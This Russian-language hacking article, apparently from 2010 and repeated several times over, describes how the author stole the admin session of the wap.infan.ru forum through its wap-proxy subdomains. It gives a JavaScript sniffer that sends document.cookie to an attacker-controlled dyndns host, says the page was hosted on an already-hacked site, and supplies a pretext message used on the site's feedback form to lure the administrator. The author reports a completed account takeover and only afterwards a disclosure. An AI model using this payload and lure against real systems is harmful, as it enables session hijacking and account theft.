Взлом сайта wap.infan.ru (Рейтинг: +8)
Всем привет! Сегодня, я вам расскажу об одной уязвимости, найденной на сайте wap.infan.ru. С помощью которой я получил доступ к профилю администратора.
Многие слышали, а может даже пользовались так называемыми анонимайзерами. На сайте wap.infan.ru есть подобный сервис. Называется он: Wap-proxy.
В общем-то все как у всех, только в дополнении есть возможность резать картинки, для удобного просмотра на телефоне и экономии трафика.
Но не в этом суть.
Анонимайзер находится на отдельном суб.домене. Для каждого сайта суб.домен создается динамически.
Пример: wap.sasisa.ru.wproxy.infan.ru
С одной стороны, в чем может быть уязвимость?
При детальном рассмотрении, можно обнаружить, что куки передаются пользователю как обычно и не хранятся на сервере. При запросе страницы через анонимайзер куки преобразуются и передаются на запрошенный сайт.
В этом и была ошибка!
На суб.домене хранятся куки от основного домена. То есть сессия и автовход. Что нам и требуется украсть.
Регистрируем сайт на бесплатном хостинге. Не обязательна поддержка php, достаточно html.
Я использовал для этих целей взломанный сайт на wap конструкторе wen.ru
В тело главной страницы встроил js код, запрашивающий с моего локального сервера картинку снифер. С выбором снифера и его установкой, я думаю разберетесь.
Осталось дело за малым, дать ссылку пользователю или администрации. Взламывать мы будем конечно админа.
Через форму обратной связи пишем:
\"Здравствуйте! У меня возникла проблема с анонимайзером. Не открывается следующий сайт: http://evilsite.wen.ru.wproxy.infan.ru\"
И отправляем!
После чего ждем, когда администратор зайдет и проверит почту.
У нас же в снифере должна появится сессия админа и если есть печенье для автовхода.
Таким образом я получил доступ к учетной записи администратора форума 7sky, к сожалению кроме управления форума, больше никакого доступа я не получил.
Не знаю к какой категории отнести данную уязвимость, это вроде и xss, но совершенно другого уровня.
Многие слышали, а может даже пользовались так называемыми анонимайзерами. На сайте wap.infan.ru есть подобный сервис. Называется он: Wap-proxy. В общем-то все как у всех, только в дополнении есть возможность резать картинки, для удобного просмотра на телефоне и экономии трафика.
Но не в этом суть. Анонимайзер находится на отдельном суб.домене. Для каждого сайта субдомен создается динамически. Пример: wap.sasisa.ru.wproxy.infan.ru
С одной стороны, в чем может быть уязвимость? При детальном рассмотрении, можно обнаружить, что куки передаются пользователю как обычно и не хранятся на сервере. При запросе страницы через анонимайзер куки преобразуются и передаются на запрошенный сайт. В этом и была ошибка! На субдомене хранятся куки от основного домена. То есть сессия и автовход. Что нам и требуется украсть.
Регистрируем сайт на бесплатном хостинге. Не обязательна поддержка php, достаточно html. Я использовал для этих целей взломанный сайт на wap конструкторе wen.ru. В тело главной страницы встроил js код, запрашивающий с моего локального сервера картинку снифер. С выбором снифера и его установкой, я думаю разберетесь.
js sniffer
<script>
img = new Image();
img.src = \"http://mylocalserver.dyndns.org/s.php?\"+document.cookie;
</script>
Осталось дело за малым, дать ссылку пользователю или администрации. Взламывать мы будем конечно админа.
Через форму обратной связи пишем: \"Здравствуйте! У меня возникла проблема с анонимайзером. Не открывается следующий сайт: http://evilsite.wen.ru.wproxy.infan.ru\" И отправляем!
После чего ждем, когда администратор зайдет и проверит почту. У нас же в снифере должна появится сессия админа и если есть печенье для автовхода. Таким образом я получил доступ к учетной записи администратора форума 7sky, к сожалению кроме управления форума, больше никакого доступа я не получил.
Не знаю к какой категории отнести данную уязвимость, это вроде и xss, но совершенно другого уровня.
После взлома, я тут же сообщил администрации о наличии уязвимости, надеюсь в ближайшее время уязвимость уберут.
Внимание статья предоставлена в целях ознакомления уязвимостей.
Добавил: Удаленный
26.11.2010 / 22:34Многие слышали, а может даже пользовались так называемыми анонимайзерами. На сайте wap.infan.ru есть подобный сервис. Называется он: Wap-proxy.
В общем-то все как у всех, только в дополнении есть возможность резать картинки, для удобного просмотра на телефоне и экономии трафика.
Но не в этом суть.
Анонимайзер находится на отдельном суб.домене. Для каждого сайта суб.домен создается динамически.
Пример: wap.sasisa.ru.wproxy.infan.ru
С одной стороны, в чем может быть уязвимость?
При детальном рассмотрении, можно обнаружить, что куки передаются пользователю как обычно и не хранятся на сервере. При запросе страницы через анонимайзер куки преобразуются и передаются на запрошенный сайт.
В этом и была ошибка!
На суб.домене хранятся куки от основного домена. То есть сессия и автовход. Что нам и требуется украсть.
Регистрируем сайт на бесплатном хостинге. Не обязательна поддержка php, достаточно html.
Я использовал для этих целей взломанный сайт на wap конструкторе wen.ru
В тело главной страницы встроил js код, запрашивающий с моего локального сервера картинку снифер. С выбором снифера и его установкой, я думаю разберетесь.
Осталось дело за малым, дать ссылку пользователю или администрации. Взламывать мы будем конечно админа.
Через форму обратной связи пишем:
\"Здравствуйте! У меня возникла проблема с анонимайзером. Не открывается следующий сайт: http://evilsite.wen.ru.wproxy.infan.ru\"
И отправляем!
После чего ждем, когда администратор зайдет и проверит почту.
У нас же в снифере должна появится сессия админа и если есть печенье для автовхода.
Таким образом я получил доступ к учетной записи администратора форума 7sky, к сожалению кроме управления форума, больше никакого доступа я не получил.
Не знаю к какой категории отнести данную уязвимость, это вроде и xss, но совершенно другого уровня.
Многие слышали, а может даже пользовались так называемыми анонимайзерами. На сайте wap.infan.ru есть подобный сервис. Называется он: Wap-proxy. В общем-то все как у всех, только в дополнении есть возможность резать картинки, для удобного просмотра на телефоне и экономии трафика.
Но не в этом суть. Анонимайзер находится на отдельном суб.домене. Для каждого сайта субдомен создается динамически. Пример: wap.sasisa.ru.wproxy.infan.ru
С одной стороны, в чем может быть уязвимость? При детальном рассмотрении, можно обнаружить, что куки передаются пользователю как обычно и не хранятся на сервере. При запросе страницы через анонимайзер куки преобразуются и передаются на запрошенный сайт. В этом и была ошибка! На субдомене хранятся куки от основного домена. То есть сессия и автовход. Что нам и требуется украсть.
Регистрируем сайт на бесплатном хостинге. Не обязательна поддержка php, достаточно html. Я использовал для этих целей взломанный сайт на wap конструкторе wen.ru. В тело главной страницы встроил js код, запрашивающий с моего локального сервера картинку снифер. С выбором снифера и его установкой, я думаю разберетесь.
js sniffer
<script>
img = new Image();
img.src = \"http://mylocalserver.dyndns.org/s.php?\"+document.cookie;
</script>
Осталось дело за малым, дать ссылку пользователю или администрации. Взламывать мы будем конечно админа.
Через форму обратной связи пишем: \"Здравствуйте! У меня возникла проблема с анонимайзером. Не открывается следующий сайт: http://evilsite.wen.ru.wproxy.infan.ru\" И отправляем!
После чего ждем, когда администратор зайдет и проверит почту. У нас же в снифере должна появится сессия админа и если есть печенье для автовхода. Таким образом я получил доступ к учетной записи администратора форума 7sky, к сожалению кроме управления форума, больше никакого доступа я не получил.
Не знаю к какой категории отнести данную уязвимость, это вроде и xss, но совершенно другого уровня.
После взлома, я тут же сообщил администрации о наличии уязвимости, надеюсь в ближайшее время уязвимость уберут.
Внимание статья предоставлена в целях ознакомления уязвимостей.
Рейтинг:
+8
Просмотры: 3275Комментарии (7) »